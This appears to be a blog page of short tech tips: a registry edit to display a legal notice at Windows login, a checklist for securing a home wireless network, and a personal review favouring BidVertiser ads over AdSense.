If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.

1. Go to Start->Run, type regedit and hit ENTER

2. Navigate to the following key in the registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system

On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.

Secure your Wireless network

Wi-Fi connects computers, printers, video camera’s and game consoles into a fast Ethernet network via microwaves.

Following actions should be taken.

* The most important thing is to change the default password of your access point.
* Firmware and the drivers of your wireless access point and wireless adapters should be up to date. They should be updates whenever necessary.
* There should be a combination of high level encryption and decent keys (WPA2/802.11i ) recommended.
* Wireless users should be authenticated with different protocols like 802.1X, RADIUS, EAP (including EAP-PAX, EAP-PSK, EAP-TLS, EAP-TTLS, EAP-FAST, EAP-POTP, EAP-IKEv2, EAP-GPSK, PEAP, and EAP-SIM.
* The above protocols give credentials including certificates, usernames, passwords etc.
* Use Wireless LAN Security Tools for securing the wireless network. This software is specifically designed for securing 802.11 wireless networks.
* Use a proxy for outgoing requests.
* Always check the security of the wireless LAN using recent tools like Airbase, AirCrack-ng etc.
* Make strict system logging on all the devices, do check your wireless log files regularly.

Banned form adsesne, BidVertiser is a good alternate

Protect yourself from fake login pages

I tried adbrite for a few days, and it was serving unrelevant ads and the Cost per Click (cpc ) was very low. recently I stumbled across a site serving BidVertiser ads, one thing that immediatley caught my attention was the ads were very much relevant to the content on that page. You usually see this only with adsense. I immediatley signed up for a bidvertiser account ( You can see the bidvertiser ads at the begining of this post) and placed their code on GeniusHackers. The results are very encouraging Bidvertiser CPC and CTR are comparable with adsesne.

The best things about Bidvertiser are:

* You will get relevant ads on your site.
* You have various ad formats to choose from, you can even have your own custom sizes so that your site look and feel isn’t lost(This feature isn’t available in adsense).
* Their minimum payout is 10 USD and you can have your payment via paypal.You can have your payment immediately. Adsense payment system is very annoying. I dont know why the still stick to that old age methods. My Octobers adsense cheque hasn’t reached me till now, i requested a reissue 6 times but they dint even bother to reply.

You should sign up for bidvertiser if you are banned from adsense, your site has less traffic and your income is low. Continue with adsesne if you have good traffic and you are not violating their terms.